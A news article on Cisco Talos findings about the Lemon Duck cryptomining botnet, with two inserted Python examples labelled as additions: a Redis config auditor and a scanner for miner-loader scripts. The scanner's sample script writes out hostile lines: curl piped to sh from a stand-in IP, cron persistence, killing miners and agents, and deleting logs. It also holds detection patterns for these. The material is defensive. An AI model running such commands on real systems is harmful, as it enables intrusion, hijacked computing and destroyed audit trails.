Wednesday, 14 October 2020 08:09

Cisco duo find cryptocurrency-mining botnet that can hit Windows and Linux


A cryptocurrency-mining botnet known as Lemon Duck has been displaying increased activity since the end of August, researchers from Cisco's Talos Intelligence Group say, adding that while defenders would have spotted this activity, it would not have been noticed by end users.

Vanja Svajcer and Caitlin Huey pointed out in a detailed blog post on Tuesday that the end-game of the multi-modular botnet was to steal computer resources to mine the Monero cryptocurrency.

The attackers behind Lemon Duck used a number of ways to spread across networks, such as sending infected RTF files using email, psexec, WMI and SMB exploits, including the EternalBlue and SMBGhost threats that affect Windows 10 machines.

"Some variants also support RDP brute-forcing," the pair wrote. "In recent attacks we observed, this functionality was omitted. The adversary also uses tools such as Mimikatz, that help the botnet increase the amount of systems participating in its mining pool."

They said they identified activity associated with the mining malware affecting three different companies in the government, retail, and technology sectors, with the activity taking place from late March 2020 to the present.

The botnet could establish a presence on either Windows or Linux servers, the researchers said, and provided a list of the vectors which the malware used to establish a presence.

The infection began with a PowerShell script that was copied from other infected systems using SMB, email or external USB drives. A number of exploits, among them EternalBlue and SMBGhost, were used; while the code for the BlueKeep flaw was present, it was disabled in the version that Svajcer and Huey took apart.

Lemon Duck had executable modules that were downloaded and installed. The email-spreading module used COVID-19 subject lines and an infected attachment was sent to all contacts in a user's Outlook address book.

The researchers outlined three Linux vectors: Redis, an open-source in-memory data structure store; YARN, a third-party package manager; and sshcopy. Windows vectors are listed in the graphic below.

[Graphic: Windows vectors]

Svajcer and Huey said the SSH spread was driven by a list of known passwords to try, with the addition of the Plink component of the PuTTY SSH client. "Plink is a scriptable command-line SSH client used to target Linux-based SSH servers using the root username," they explained.

"Plink can often be detected as a potentially unwanted application by anti-malware software. Lemon Duck appends 100 randomly generated bytes to the downloaded Plink executable, likely to break the cryptographic checksum-based detections. The remote command will download and launch the first stage of the bash script Lemon Duck loader for Linux systems."

They said a similar strategy was used to target systems running YARN and Redis. "With YARN, the actors attempt to exploit a vulnerability from 2018 that does not have a CVE number attached. If the exploitation is successful, a script to download and launch the Linux loader is executed.

"Lemon Duck targets incorrectly configured Redis key-value database installations that do not require a password for connections. Once successfully connected, the spreader creates a cron job to automatically run the same Linux download and execute code for the main Linux loader module."
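The Redis exposure described above is a configuration problem, so the practical defensive check is an audit of the instance's settings. The following is an added example, not code from Cisco Talos or iTWire: it parses the standard redis.conf directive syntax and flags the settings that let an unauthenticated client on the network run commands against the store. Both sample configurations are constructed, and the finding codes are this example's own.

```python
"""Audit a redis.conf for the exposure the Lemon Duck Redis spreader relies on:
an instance that accepts connections without a password. Added example, not
code from Cisco Talos or iTWire; assumes standard redis.conf directive syntax,
and both sample configurations below are constructed."""
from typing import Dict, List

# Constructed: the kind of config that leaves Redis open to anyone who can reach the port.
WEAK_CONF = """
# constructed sample redis.conf (weak)
bind 0.0.0.0
protected-mode no
port 6379
"""

# Constructed: the same instance with the usual hardening applied.
HARDENED_CONF = """
# constructed sample redis.conf (hardened)
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass "constructed-long-random-passphrase-change-me"
rename-command CONFIG ""
"""


def parse_redis_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive (lower-cased) to the list of its argument strings in
    file order. Redis applies the last occurrence of a directive, so callers
    look at index -1; rename-command is the exception, where every line counts."""
    directives: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        args = parts[1].strip() if len(parts) > 1 else ""
        directives.setdefault(parts[0].lower(), []).append(args)
    return directives


def audit_redis_conf(text: str) -> List[str]:
    """Return short finding codes for the settings the spreader benefits from."""
    conf = parse_redis_conf(text)
    findings: List[str] = []

    # 1. No password: any client that can connect can run every command.
    passwords = conf.get("requirepass", [])
    if not passwords or passwords[-1].strip("\"'") == "":
        findings.append("no-requirepass")

    # 2. Bound to every interface (Redis with no bind line listens on all of them).
    bind = conf.get("bind", [""])[-1].split()
    if not bind or any(addr in ("0.0.0.0", "*", "::") for addr in bind):
        findings.append("bind-all-interfaces")

    # 3. protected-mode is the safety net against unauthenticated non-loopback clients.
    if conf.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode-off")

    # 4. CONFIG lets a connected client change persistence settings at runtime;
    #    renaming it to "" disables it, which is the standard Redis hardening step.
    renamed: Dict[str, str] = {}
    for args in conf.get("rename-command", []):
        parts = args.split()
        if len(parts) == 2:
            renamed[parts[0].upper()] = parts[1]
    if renamed.get("CONFIG") != '""':
        findings.append("config-command-enabled")

    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"{label}: {audit_redis_conf(conf) or ['no findings']}")
```

Run against the weak sample the audit reports all four codes; against the hardened sample it reports none. The bind check treats a missing `bind` line as listening on all interfaces, which is Redis's default behaviour and the case an operator is most likely to miss.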

The botnet also has modules for email spreading, a module to kill processes that could interfere with its operation, an executable dropper, and a Python module packaged with PyInstaller.

Two shell scripts were downloaded to infected Linux systems: the first terminated any competing cryptocurrency miners that were running, and also stopped and removed cloud security agents from Alibaba and Tencent.

The second script downloaded the XMRig miner and then tried to delete various system logs.
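The behaviours the article attributes to the two Linux scripts and the Redis spreader (a download-and-execute loader, cron persistence, killing competing miners, stopping cloud security agents, deleting logs) are individually unremarkable in admin scripts but rarely occur together, which is what makes them useful as a detection. The following is an added example, not code from Cisco Talos or iTWire: a line-level scanner that tags each behaviour in a shell script or cron entry. The regular expressions, the miner and vendor keyword lists, and the sample script are all constructed; the keyword lists in particular stand in for the process and service names actually present in your estate.

```python
"""Tag the behaviours the article attributes to Lemon Duck's Linux scripts.
Added example, not code from Cisco Talos or iTWire; the rules, keyword lists
and SAMPLE_SCRIPT are constructed for illustration."""
import re
from typing import Dict, List

# Constructed keyword lists; replace with the names actually seen in your estate.
MINER_NAMES = r"(xmrig|minerd)"
CLOUD_AGENT_VENDORS = r"(aliyun|tencent)"

RULES: Dict[str, "re.Pattern[str]"] = {
    # curl/wget piped straight into a shell, or sh -c "$(curl ...)"
    "download-and-execute": re.compile(
        r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b|\b(ba)?sh\s+-c\s+[\"']?\$\((curl|wget)\b"),
    # writing to the cron spool or invoking crontab is how the spreader persists
    "cron-persistence": re.compile(r"/var/spool/cron|/etc/cron|\bcrontab\b"),
    # the first script kills competing miners before the second installs XMRig
    "competing-miner-kill": re.compile(
        r"\b(pkill|killall|kill)\b.*\b" + MINER_NAMES + r"\b"),
    # stopping, uninstalling or deleting a cloud vendor's security agent
    "cloud-agent-removal": re.compile(
        r"\b(systemctl\s+(stop|disable)|service\s+\S+\s+stop|uninstall|rm\s+-rf)\b.*\b"
        + CLOUD_AGENT_VENDORS),
    # deleting or truncating /var/log entries and clearing shell history
    "log-tampering": re.compile(
        r"\brm\b.*(/var/log|bash_history)|>\s*/var/log/|\bhistory\s+-c\b"),
}

# Constructed sample in the style the article describes; not a real Lemon Duck script.
# 203.0.113.0/24 is a documentation range, so the URL resolves to nothing.
SAMPLE_SCRIPT = "\n".join([
    "#!/bin/sh",
    "# constructed sample, not a real Lemon Duck script",
    "pkill -f xmrig",
    "killall -9 minerd",
    "systemctl stop aliyun-service",
    "rm -rf /usr/local/tencent-agent",
    "curl -fsSL http://203.0.113.10/ld.sh | sh",
    'echo "*/5 * * * * curl -fsSL http://203.0.113.10/ld.sh | sh" > /var/spool/cron/root',
    "rm -rf /var/log/*.log",
    "echo > /var/log/wtmp",
    "history -c",
])


def scan_script(text: str) -> Dict[str, List[int]]:
    """Return {behaviour: [1-based line numbers]} for every rule that fired."""
    hits: Dict[str, List[int]] = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # comments and the shebang carry no behaviour
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits


def is_miner_loader(hits: Dict[str, List[int]], min_behaviours: int = 2) -> bool:
    """One rule firing is common in legitimate admin scripts; the combination is not."""
    return len(hits) >= min_behaviours


if __name__ == "__main__":
    found = scan_script(SAMPLE_SCRIPT)
    for behaviour, lines in found.items():
        print(f"{behaviour:22s} lines {lines}")
    print("miner loader:", is_miner_loader(found))
```

The scanner is meant for scripts recovered from a cron spool, a download cache or an EDR alert, not for live traffic; the threshold in `is_miner_loader` keeps a lone `rm -rf /var/log/old/*.log` in a rotation script from paging anyone, while the sample above trips all five rules.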

"Defenders need to be constantly vigilant and monitor the behaviour of systems within their network to spot new resource-stealing threats such as cryptominers," Svajcer and Huey said.

"Cryptocurrency-mining botnets can be costly in terms of the stolen computing cycles and power consumption costs.

"While organisations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure."




Sam Varghese


Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.
